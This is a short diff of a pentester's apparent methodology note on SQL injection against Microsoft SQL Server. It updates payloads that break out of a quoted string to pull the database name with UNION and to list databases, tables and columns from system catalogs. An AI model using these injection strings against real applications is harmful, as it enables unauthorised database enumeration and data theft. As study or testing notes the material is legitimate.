ChaseHCS/methodology/Foothold/SQLI.md

 ' UNION ALL SELECT 1,DB_NAME(),3--

 # Get DBs
-' SELECT name FROM master..sysdatabases
+' SELECT name FROM master.sys.databases--

 # Get tables
-' SELECT name FROM <db>..sysobjects WHERE xtype = 'U'
+' SELECT name FROM <db>.sys.objects WHERE type = 'U'

 # Get columns
 ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<table>')